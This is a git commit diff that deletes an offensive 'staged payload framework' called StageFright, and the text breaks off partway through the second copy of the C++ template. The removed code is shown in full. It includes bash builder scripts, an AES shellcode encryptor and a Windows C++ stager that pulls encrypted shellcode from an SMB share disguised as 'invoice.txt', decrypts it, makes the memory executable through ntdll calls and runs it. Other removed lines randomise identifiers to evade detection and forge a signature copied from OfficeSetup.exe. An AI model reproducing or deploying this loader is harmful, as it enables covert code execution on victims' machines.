
Delete StageFright/StageFright directory

assume-breach 2 лет назад
Родитель
Сommit
e35eb6748e
35 измененных файлов с 0 добавлено и 3015 удалено
  1. 0 76
      StageFright/StageFright/DLL.sh
  2. 0 76
      StageFright/StageFright/EXE.sh
  3. 0 76
      StageFright/StageFright/StageFright.sh
  4. BIN
      StageFright/StageFright/StageFright/Resources/OfficeSetup.exe
  5. 0 26
      StageFright/StageFright/StageFright/Resources/aesencrypt.py
  6. 0 26
      StageFright/StageFright/StageFright/SMB/Resources/aesencrypt.py
  7. 0 0
      StageFright/StageFright/StageFright/SMB/Resources/con.py
  8. 0 252
      StageFright/StageFright/StageFright/SMB/Resources/template.cpp
  9. 0 190
      StageFright/StageFright/StageFright/SMB/SMB.sh
  10. 0 4
      StageFright/StageFright/StageFright/SMB/conv.py
  11. 0 252
      StageFright/StageFright/StageFright/SMB/template.cpp
  12. 0 26
      StageFright/StageFright/StageFright/SMBDLL/Resources/aesencrypt.py
  13. 0 0
      StageFright/StageFright/StageFright/SMBDLL/Resources/con.py
  14. BIN
      StageFright/StageFright/StageFright/SMBDLL/Resources/invoice.txt
  15. BIN
      StageFright/StageFright/StageFright/SMBDLL/Resources/malware.dll
  16. 0 252
      StageFright/StageFright/StageFright/SMBDLL/Resources/template.cpp
  17. 0 181
      StageFright/StageFright/StageFright/SMBDLL/SMBDLL.sh
  18. 0 4
      StageFright/StageFright/StageFright/SMBDLL/conv.py
  19. 0 252
      StageFright/StageFright/StageFright/SMBDLL/template.cpp
  20. 0 26
      StageFright/StageFright/StageFright/TCP/Resources/aesencrypt.py
  21. 0 0
      StageFright/StageFright/StageFright/TCP/Resources/con.py
  22. 0 188
      StageFright/StageFright/StageFright/TCP/Resources/template.cpp
  23. 0 189
      StageFright/StageFright/StageFright/TCP/TCP.sh
  24. 0 4
      StageFright/StageFright/StageFright/TCP/conv.py
  25. 0 69
      StageFright/StageFright/StageFright/TCP/tcp_server.py
  26. 0 188
      StageFright/StageFright/StageFright/TCP/template.cpp
  27. 0 26
      StageFright/StageFright/StageFright/TCPDLL/Resources/aesencrypt.py
  28. 0 0
      StageFright/StageFright/StageFright/TCPDLL/Resources/con.py
  29. BIN
      StageFright/StageFright/StageFright/TCPDLL/Resources/malware.dll
  30. 0 188
      StageFright/StageFright/StageFright/TCPDLL/Resources/template.cpp
  31. 0 175
      StageFright/StageFright/StageFright/TCPDLL/TCPDLL.sh
  32. 0 4
      StageFright/StageFright/StageFright/TCPDLL/conv.py
  33. 0 188
      StageFright/StageFright/StageFright/TCPDLL/template.cpp
  34. 0 8
      StageFright/StageFright/setup.sh
  35. 0 69
      StageFright/StageFright/tcp_server.py

+ 0 - 76
StageFright/StageFright/DLL.sh

@@ -1,76 +0,0 @@
-#!/bin/bash
-
-NO_COLOR="\e[0m"
-WHITE="\e[0;17m"
-BOLD_WHITE="\e[1;37m"
-BLACK="\e[0;30m"
-BLUE="\e[0;34m"
-BOLD_BLUE="\e[1;34m"
-GREEN="\e[0;32m"
-BOLD_GREEN="\e[1;32m"
-CYAN="\e[0;36m"
-BOLD_CYAN="\e[1;36m"
-RED="\e[0;31m"
-BOLD_RED="\e[1;31m"
-PURPLE="\e[0;35m"
-BOLD_PURPLE="\e[1;35m"
-BROWN="\e[0;33m"
-BOLD_YELLOW="\e[1;33m"
-GRAY="\e[0;37m"
-BOLD_GRAY="\e[1;30m"
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-
-function easyexit()
-{
-	clear
-	exit
-}
-
-function title() {
-echo -e "$BOLD_GREEN
-
- _____ _                    ______    _       _     _   
-/  ___|| |                  |  ___|  (_)     | |   | |  
-\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
- --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
-/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
-\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
-                 __/ |                   __/ |          
-                |___/                   |___/           
-
-          **by assume-breach**
-
-       A staged payload framework. "
-}
-
-title
-echo -e $BOLD_CYAN
-echo "Choose an option:"
-echo ""
-echo -e "$BOLD_BLUE 1.$BOLD_WHITE SMB Stager DLL"
-echo -e "$BOLD_BLUE 2.$BOLD_WHITE TCP Stager DLL"
-echo ""
-echo -n -e "$BOLD_WHITE > "
-read CHOICE
-clear
-
-if [ $CHOICE == 1 ]; then
-	echo ""
-	bash StageFright/SMBDLL/SMBDLL.sh
-
-elif [ $CHOICE == 2 ]; then
-	echo ""
-	bash StageFright/TCPDLL/TCPDLL.sh
-
-else 
-	echo -e $BOLD_RED Invalid option
-	sleep 3
-	trap easyexit EXIT
-fi

+ 0 - 76
StageFright/StageFright/EXE.sh

@@ -1,76 +0,0 @@
-#!/bin/bash
-
-NO_COLOR="\e[0m"
-WHITE="\e[0;17m"
-BOLD_WHITE="\e[1;37m"
-BLACK="\e[0;30m"
-BLUE="\e[0;34m"
-BOLD_BLUE="\e[1;34m"
-GREEN="\e[0;32m"
-BOLD_GREEN="\e[1;32m"
-CYAN="\e[0;36m"
-BOLD_CYAN="\e[1;36m"
-RED="\e[0;31m"
-BOLD_RED="\e[1;31m"
-PURPLE="\e[0;35m"
-BOLD_PURPLE="\e[1;35m"
-BROWN="\e[0;33m"
-BOLD_YELLOW="\e[1;33m"
-GRAY="\e[0;37m"
-BOLD_GRAY="\e[1;30m"
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-
-function easyexit()
-{
-	clear
-	exit
-}
-
-function title() {
-echo -e "$BOLD_GREEN
-
- _____ _                    ______    _       _     _   
-/  ___|| |                  |  ___|  (_)     | |   | |  
-\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
- --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
-/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
-\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
-                 __/ |                   __/ |          
-                |___/                   |___/           
-
-          **by assume-breach**
-
-       A staged payload framework. "
-}
-
-title
-echo -e $BOLD_CYAN
-echo "Choose an option:"
-echo ""
-echo -e "$BOLD_BLUE 1.$BOLD_WHITE AES Encrypted SMB Stager"
-echo -e "$BOLD_BLUE 2.$BOLD_WHITE AES Encrypted TCP Stager"
-echo ""
-echo -n -e "$BOLD_WHITE > "
-read CHOICE
-clear
-
-if [ $CHOICE == 1 ]; then
-	echo ""
-	bash StageFright/SMB/SMB.sh
-
-elif [ $CHOICE == 2 ]; then
-	echo ""
-	bash StageFright/TCP/TCP.sh
-
-else 
-	echo -e $BOLD_RED Invalid option
-	sleep 3
-	trap easyexit EXIT
-fi

+ 0 - 76
StageFright/StageFright/StageFright.sh

@@ -1,76 +0,0 @@
-#!/bin/bash
-
-NO_COLOR="\e[0m"
-WHITE="\e[0;17m"
-BOLD_WHITE="\e[1;37m"
-BLACK="\e[0;30m"
-BLUE="\e[0;34m"
-BOLD_BLUE="\e[1;34m"
-GREEN="\e[0;32m"
-BOLD_GREEN="\e[1;32m"
-CYAN="\e[0;36m"
-BOLD_CYAN="\e[1;36m"
-RED="\e[0;31m"
-BOLD_RED="\e[1;31m"
-PURPLE="\e[0;35m"
-BOLD_PURPLE="\e[1;35m"
-BROWN="\e[0;33m"
-BOLD_YELLOW="\e[1;33m"
-GRAY="\e[0;37m"
-BOLD_GRAY="\e[1;30m"
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-
-function easyexit()
-{
-	clear
-	exit
-}
-
-function title() {
-echo -e "$BOLD_GREEN
-
- _____ _                    ______    _       _     _   
-/  ___|| |                  |  ___|  (_)     | |   | |  
-\  --\_| |_ __ _  __   ___  | |_ ____ _  ____| |_  | |_ 
- --\  |  __/ _ |/ _  |/ _ \ |  _|  __| |/ _  |  _ \| __|
-/\__/ / || (_| | (_| |  __/ | | | |  | | (_| | | | | |_ 
-\____/ \__\__,_|\__, |\___| \_| |_|  |_|\__, |_| |_|\__|
-                 __/ |                   __/ |          
-                |___/                   |___/           
-
-                **by assume-breach**
-
-             A staged payload framework." 
-}
-
-title
-echo -e $BOLD_CYAN
-echo "Choose an option:"
-echo ""
-echo -e "$BOLD_BLUE 1.$BOLD_WHITE Create Staged EXE"
-echo -e "$BOLD_BLUE 2.$BOLD_WHITE Create Staged DLL"
-echo ""
-echo -n -e "$BOLD_WHITE > "
-read CHOICE
-clear
-
-if [ $CHOICE == 1 ]; then
-	echo ""
-	bash EXE.sh
-
-elif [ $CHOICE == 2 ]; then
-	echo ""
-	bash DLL.sh
-
-else
-	echo -e $BOLD_RED Invalid option
-	sleep 3
-	trap easyexit EXIT
-fi

BIN
StageFright/StageFright/StageFright/Resources/OfficeSetup.exe


+ 0 - 26
StageFright/StageFright/StageFright/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

+ 0 - 26
StageFright/StageFright/StageFright/SMB/Resources/aesencrypt.py

@@ -1,26 +0,0 @@
-# Red Team Operator course code template
-# payload encryption with AES
-# 
-# author: reenz0h (twitter: @SEKTOR7net)
-
-import sys
-from base64 import b64encode
-from Crypto.Cipher import AES
-from Crypto.Util.Padding import pad
-from Crypto.Random import get_random_bytes
-import hashlib
-
-KEY = get_random_bytes(16)
-iv = 16 * b'\x00'
-cipher = AES.new(hashlib.sha256(KEY).digest(), AES.MODE_CBC, iv)
-
-try:
-    plaintext = open(sys.argv[1], "rb").read()
-except:
-    print("File argument needed! %s <raw payload file>" % sys.argv[0])
-    sys.exit()
-
-ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
-
-print('AESkey[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in KEY) + ' };')
-print('payload[] = { 0x' + ', 0x'.join(hex(x)[2:] for x in ciphertext) + ' };')

Разница между файлами не показана из-за своего большого размера
+ 0 - 0
StageFright/StageFright/StageFright/SMB/Resources/con.py


+ 0 - 252
StageFright/StageFright/StageFright/SMB/Resources/template.cpp

@@ -1,252 +0,0 @@
-#include <windows.h>
-#include <winternl.h>
-#include <wchar.h>
-#include <winternl.h>
-#include <winbase.h>
-#include <winnt.h>
-#include <fileapi.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#include <psapi.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32.lib")
-
-#ifndef NTSTATUS
-typedef LONG NTSTATUS;
-#endif
-
-#ifndef NT_SUCCESS
-#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
-#endif
-
-typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    ULONG_PTR ZeroBits,
-    PSIZE_T RegionSize,
-    ULONG AllocationType,
-    ULONG Protect);
-
-typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG FreeType);
-
-typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG NewProtect,
-    PULONG OldProtect);
-
-typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
-    OUT PHANDLE ThreadHandle,
-    IN ACCESS_MASK DesiredAccess,
-    IN LPVOID ObjectAttributes,
-    IN HANDLE ProcessHandle,
-    IN LPTHREAD_START_ROUTINE StartAddress,
-    IN LPVOID Parameter,
-    IN BOOL CreateSuspended,
-    IN ULONG StackZeroBits,
-    IN ULONG SizeOfStackCommit,
-    IN ULONG SizeOfStackReserve,
-    OUT LPVOID BytesBuffer);
-
-typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
-    HANDLE ObjectHandle,
-    BOOLEAN Alertable,
-    PLARGE_INTEGER Timeout);
-
-typedef NTSTATUS(WINAPI* _NtClose)(
-    HANDLE Handle);
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter);
-
-void PrintError(const wchar_t* action) {}
-
-BOOL oChGWKarQjmd(LPCWSTR szServer, LPCWSTR szFilePath, PBYTE* binaryData, SIZE_T* binarySize) {
-    BOOL operationSuccess = TRUE;
-    PBYTE allocatedMemory = NULL;
-
-    WCHAR szFullUNCPath[MAX_PATH];
-    swprintf_s(szFullUNCPath, MAX_PATH, L"\\\\%s\\%s", szServer, szFilePath);
-
-    HANDLE hFile = CreateFileW(szFullUNCPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-    if (hFile == INVALID_HANDLE_VALUE) {
-        operationSuccess = FALSE;
-    }
-    else {
-        DWORD fileSize = GetFileSize(hFile, NULL);
-        if (fileSize == INVALID_FILE_SIZE) {
-            operationSuccess = FALSE;
-        }
-        else {
-            SIZE_T allocationSize = fileSize;
-
-            _NtAllocateVirtualMemory pNtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
-            NTSTATUS status = pNtAllocateVirtualMemory(
-                GetCurrentProcess(),
-                (PVOID*)&allocatedMemory,
-                0,
-                &allocationSize,
-                MEM_COMMIT | MEM_RESERVE,
-                PAGE_READWRITE);
-
-            if (!NT_SUCCESS(status)) {
-                operationSuccess = FALSE;
-            }
-            else {
-                DWORD bytesRead;
-                if (!ReadFile(hFile, allocatedMemory, fileSize, &bytesRead, NULL)) {
-                    operationSuccess = FALSE;
-                }
-
-                *binaryData = allocatedMemory;
-                *binarySize = bytesRead;
-            }
-        }
-
-        CloseHandle(hFile);
-    }
-
-    return operationSuccess;
-}
-
-BOOL VIJanVqcg(const PBYTE BinaryData, SIZE_T DataSize) {
-    LPVOID pMemory = VirtualAlloc(NULL, DataSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
-    if (pMemory == NULL) {
-        return FALSE;
-    }
-
-    memcpy(pMemory, BinaryData, DataSize);
-
-    _NtProtectVirtualMemory pNtProtectVirtualMemory = (_NtProtectVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtProtectVirtualMemory");
-    SIZE_T regionSize = DataSize;
-    ULONG oldProtect;
-    NTSTATUS status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_NOACCESS,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    status = pNtProtectVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        PAGE_EXECUTE_READ,
-        &oldProtect);
-
-    if (!NT_SUCCESS(status)) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    HANDLE hThread = CreateThread(NULL, 0, ThreadFunction, pMemory, CREATE_SUSPENDED, NULL);
-    if (hThread == NULL) {
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    ULONG suspendCount = ResumeThread(hThread);
-    if (suspendCount == (DWORD)-1) {
-        CloseHandle(hThread);
-        VirtualFree(pMemory, 0, MEM_RELEASE);
-        return FALSE;
-    }
-
-    WaitForSingleObject(hThread, INFINITE);
-
-    _NtClose pNtClose = (_NtClose)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtClose");
-    status = pNtClose(hThread);
-
-    _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-    status = pNtFreeVirtualMemory(
-        GetCurrentProcess(),
-        &pMemory,
-        &regionSize,
-        MEM_RELEASE);
-
-    return TRUE;
-}
-
-DWORD WINAPI ThreadFunction(LPVOID lpParameter) {
-    PBYTE BinaryData = (PBYTE)lpParameter;
-    typedef void (*FunctionPointer)();
-    FunctionPointer pFunction = (FunctionPointer)BinaryData;
-
-    pFunction();
-
-    return 0;
-}
-
-int deTOQBVTuK(char* Random4, unsigned int LrJUg, char* ycwrsVM, size_t ycwrsVMlen) {
-    HCRYPTPROV hProv;
-    HCRYPTHASH hHash;
-    HCRYPTKEY hKey;
-
-    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
-        return -1;
-    }
-    if (!CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash)) {
-        return -1;
-    }
-    if (!CryptHashData(hHash, (BYTE*)ycwrsVM, (DWORD)ycwrsVMlen, 0)) {
-        return -1;
-    }
-    if (!CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey)) {
-        return -1;
-    }
-
-    if (!CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, Random4, &LrJUg)) {
-        return -1;
-    }
-
-    CryptReleaseContext(hProv, 0);
-    CryptDestroyHash(hHash);
-    CryptDestroyKey(hKey);
-
-    return 0;
-}
-
-char nzjimSxfJSWR[] =  { 0x73, 0x29, 0x6a, 0x97, 0xdb, 0x93, 0xc6, 0x4d, 0x6a, 0x5f, 0x6c, 0x42, 0xe2, 0xf2, 0xf9, 0x7a };
-
-int main() {
-    LPCWSTR szServer = L"Win11Blue";
-    LPCWSTR szFilePath = L"Shared\\invoice.txt";
-
-    PBYTE GHqjoSGLKLzfx;
-    SIZE_T GHqjoSGLKLzfxSize;
-
-    BOOL success = oChGWKarQjmd(szServer, szFilePath, &GHqjoSGLKLzfx, &GHqjoSGLKLzfxSize);
-
-    if (success) {
-        deTOQBVTuK((char*)GHqjoSGLKLzfx, GHqjoSGLKLzfxSize, nzjimSxfJSWR, sizeof(nzjimSxfJSWR));
-
-        success = VIJanVqcg(GHqjoSGLKLzfx, GHqjoSGLKLzfxSize);
-
-        _NtFreeVirtualMemory pNtFreeVirtualMemory = (_NtFreeVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtFreeVirtualMemory");
-        SIZE_T regionSize = GHqjoSGLKLzfxSize;
-        NTSTATUS status = pNtFreeVirtualMemory(
-            GetCurrentProcess(),
-            (PVOID*)&GHqjoSGLKLzfx,
-            &regionSize,
-            MEM_RELEASE);
-
-        LocalFree(GHqjoSGLKLzfx);
-    }
-
-    return success ? 0 : 1;
-}
-

+ 0 - 190
StageFright/StageFright/StageFright/SMB/SMB.sh

@@ -1,190 +0,0 @@
-#!/bin/bash
-
-# Color variables
-red='\033[0;31m'
-green='\033[0;32m'
-yellow='\033[0;33m'
-blue='\033[0;34m'
-magenta='\033[0;35m'
-cyan='\033[0;36m'
-# Clear the color after that
-clear='\033[0m'
-cat << "EOF"
-
-  ___   _____ _____   _____                            _           _ 
- / _ \ |  ___/  ___| |  ___|                          | |         | |
-/ /_\ \| |__ \ `--.  | |__ _ __   ___ _ __ _   _ _ __ | |_ ___  __| |
-|  _  ||  __| `--. \ |  __| '_ \ / __| '__| | | | '_ \| __/ _ \/ _` |
-| | | || |___/\__/ / | |__| | | | (__| |  | |_| | |_) | ||  __/ (_| |
-\_| |_/\____/\____/  \____/_| |_|\___|_|   \__, | .__/ \__\___|\__,_|
-                                            __/ | |                  
-                                           |___/|_|                  
- _____ _                       _   ________  _________               
-/  ___| |                     | | /  ___|  \/  || ___ \              
-\ `--.| |_ __ _  __ _  ___  __| | \ `--.| .  . || |_/ /              
- `--. \ __/ _` |/ _` |/ _ \/ _` |  `--. \ |\/| || ___ \              
-/\__/ / || (_| | (_| |  __/ (_| | /\__/ / |  | || |_/ /              
-\____/ \__\__,_|\__, |\___|\__,_| \____/\_|  |_/\____/               
-                 __/ |                                               
-                |___/                                                
- _____                    _   _                                      
-|  ___|                  | | (_)                                     
-| |____  _____  ___ _   _| |_ _  ___  _ __                           
-|  __\ \/ / _ \/ __| | | | __| |/ _ \| '_ \                          
-| |___>  <  __/ (__| |_| | |_| | (_) | | | |                         
-\____/_/\_\___|\___|\__,_|\__|_|\___/|_| |_|                                             
-
-EOF
-
-echo -e ${green}"Enter The Path To Your Shellcode File. ex: /home/user/Downloads/shellcode.bin"${clear}
-echo ""
-read Shellcode
-echo ""
-echo -e ${green}"What's The Hostname Of Your Target? ex: Win11Wkstn"${clear}
-echo ""
-read HOSTNAME
-echo ""
-echo -e ${green}"Enter The Share Name You're Hosting Your Shellcode From'. ex: CorporateShare"${clear}
-echo ""
-read SHAREFOLDER
-echo ""
-echo -e ${green}"Name Your Shellcode File. ex: invoice.txt"${clear}
-echo ""
-read SHELLCODEFILE
-echo ""
-echo -e ${green}"Name Your Malware! ex: malware.exe"${clear}
-echo ""
-read MALWARE
-echo ""
-cp StageFright/SMB/template.cpp StageFright/SMB/Resources/template.cpp
-echo -e ${yellow}"+++Encrypting Payload+++" ${clear}
-echo ""
-sleep 2
-python3 StageFright/SMB/Resources/aesencrypt.py $Shellcode > shell.txt
-echo -e ${yellow}"***Encryption Completed***"${clear}
-echo ""
-cp shell.txt shell2.txt
-
-#Generate AES Key
-keys=$(cat "shell2.txt")
-cut -d 'p' -f1 shell2.txt > shell3.txt
-keys=$(cat shell3.txt)
-keysnow=${keys#*=}
-sed -i "s/KEYVALUE/$keysnow/g" StageFright/SMB/Resources/template.cpp
-
-#Generate AES Payload
-payload=$(cat "shell.txt")
-payloadnow=${payload#*;}
-payloadtoday=${payloadnow#*=}
-echo $payloadtoday > shell5.txt
-cp StageFright/SMB/conv.py StageFright/SMB/Resources/con.py
-perl -pe 's/PAYVAL/`cat shell5.txt`/ge' -i StageFright/SMB/Resources/con.py
-sed -i "s/{/[/g" -i StageFright/SMB/Resources/con.py
-sed -i "s/}/]/g" -i StageFright/SMB/Resources/con.py
-sed -i "s/;//g" -i StageFright/SMB/Resources/con.py
-python3 StageFright/SMB/Resources/con.py
-#rm StageFright/SMB/Resources/con.py
-mv payload.bin $SHELLCODEFILE
-sleep 2
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomE=$(cat shell.txt)
-sed -i "s/RandomE/$RandomE/g" StageFright/SMB/Resources/template.cpp
-
-
-#Replace IP, PORT and SHELLCODEFILE
-sed -i "s/SHAREFOLDER/$SHAREFOLDER/g" StageFright/SMB/Resources/template.cpp
-sed -i "s/HOSTNAME/$HOSTNAME/g" StageFright/SMB/Resources/template.cpp
-sed -i "s/SHELLCODEFILE/$SHELLCODEFILE/g" StageFright/SMB/Resources/template.cpp
-#Replacing Values
-
-# Get Payload From URL Function
-
-#FindShare
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random1=$(cat shell.txt)
-sed -i "s/Random1/$Random1/g" StageFright/SMB/Resources/template.cpp
-
-#pPayloadBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-Random2=$(cat shell.txt)
-sed -i "s/Random2/$Random2/g" StageFright/SMB/Resources/template.cpp
-
-#sPayloadSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random3=$(cat shell.txt)
-sed -i "s/Random3/$Random3/g" StageFright/SMB/Resources/template.cpp
-
-#bSTATE
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-5} | head -n 1 > shell.txt
-Random5=$(cat shell.txt)
-sed -i "s/Random5/$Random5/g" StageFright/SMB/Resources/template.cpp
-
-#sSize
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-7} | head -n 1 > shell.txt
-Random6=$(cat shell.txt)
-sed -i "s/Random6/$Random6/g" StageFright/SMB/Resources/template.cpp
-
-#hInternet
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-Random7=$(cat shell.txt)
-sed -i "s/Random7/$Random7/g" StageFright/SMB/Resources/template.cpp
-
-#dwBytesRead
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-13} | head -n 1 > shell.txt
-Random8=$(cat shell.txt)
-sed -i "s/Random8/$Random8/g" StageFright/SMB/Resources/template.cpp
-
-#pBytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-10} | head -n 1 > shell.txt
-Random9=$(cat shell.txt)
-sed -i "s/Random9/$Random9/g" StageFright/SMB/Resources/template.cpp
-
-#PAYLOAD
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomA=$(cat shell.txt)
-sed -i "s/RandomA/$RandomA/g" StageFright/SMB/Resources/template.cpp
-
-#Sleep Function
-
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomJ=$(cat shell.txt)
-sed -i "s/RandomJ/$RandomJ/g" StageFright/SMB/Resources/template.cpp
-
-#AES KEY NAME
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-12} | head -n 1 > shell.txt
-RandomK=$(cat shell.txt)
-sed -i "s/RandomK/$RandomK/g" StageFright/SMB/Resources/template.cpp
-
-# Main Function
-
-#Bytes
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-9} | head -n 1 > shell.txt
-RandomB=$(cat shell.txt)
-sed -i "s/RandomB/$RandomB/g" StageFright/SMB/Resources/template.cpp
-
-#Size
-cat /dev/urandom | tr -dc '[:alpha:]' | fold -w ${1:-11} | head -n 1 > shell.txt
-RandomC=$(cat shell.txt)
-sed -i "s/RandomC/$RandomC/g" StageFright/SMB/Resources/template.cpp
-
-#Compile
-
-echo -e ${yellow}"+++Compiling Malware+++"${clear}
-x86_64-w64-mingw32-g++ -o $MALWARE StageFright/SMB/Resources/template.cpp -Wno-narrowing -fpermissive -lws2_32 -lntdll -O2 >/dev/null 2>&1
-echo ""
-sleep 2
-rm shell*
-echo -e ${yellow}"***Malware Compiled***"${clear}
-echo ""
-sleep 2
-echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
-echo ""
-sleep 2
-python3 python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
-mv signed$MALWARE $MALWARE
-echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
-echo ""
-
-
-

+ 0 - 4
StageFright/StageFright/StageFright/SMB/conv.py

@@ -1,4 +0,0 @@
-buf=PAYVAL 
-payload = bytes(bytearray(buf))
-with open('payload.bin', 'wb') as f:
-    f.write(payload)

+ 0 - 252
StageFright/StageFright/StageFright/SMB/template.cpp

@@ -1,252 +0,0 @@
-#include <windows.h>
-#include <winternl.h>
-#include <wchar.h>
-#include <winternl.h>
-#include <winbase.h>
-#include <winnt.h>
-#include <fileapi.h>
-#include <stdio.h>
-#include <stdint.h>
-#include <stdlib.h>
-#include <string.h>
-#include <wincrypt.h>
-#include <psapi.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "crypt32.lib")
-#pragma comment(lib, "advapi32.lib")
-
-#ifndef NTSTATUS
-typedef LONG NTSTATUS;
-#endif
-
-#ifndef NT_SUCCESS
-#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
-#endif
-
-typedef NTSTATUS(WINAPI* _NtAllocateVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    ULONG_PTR ZeroBits,
-    PSIZE_T RegionSize,
-    ULONG AllocationType,
-    ULONG Protect);
-
-typedef NTSTATUS(WINAPI* _NtFreeVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG FreeType);
-
-typedef NTSTATUS(WINAPI* _NtProtectVirtualMemory)(
-    HANDLE ProcessHandle,
-    PVOID* BaseAddress,
-    PSIZE_T RegionSize,
-    ULONG NewProtect,
-    PULONG OldProtect);
-
-typedef NTSTATUS(WINAPI* _NtCreateThreadEx)(
-    OUT PHANDLE ThreadHandle,
-    IN ACCESS_MASK DesiredAccess,
-    IN LPVOID ObjectAttributes,
-    IN HANDLE ProcessHandle,
-    IN LPTHREAD_START_ROUTINE StartAddress,
-    IN LPVOID Parameter,
-    IN BOOL CreateSuspended,
-    IN ULONG StackZeroBits,
-    IN ULONG SizeOfStackCommit,
-    IN ULONG SizeOfStackReserve,
-    OUT LPVOID BytesBuffer);
-
-typedef NTSTATUS(WINAPI* _NtWaitForSingleObject)(
-    HANDLE ObjectHandle,
-    BOOLEAN Alertable,
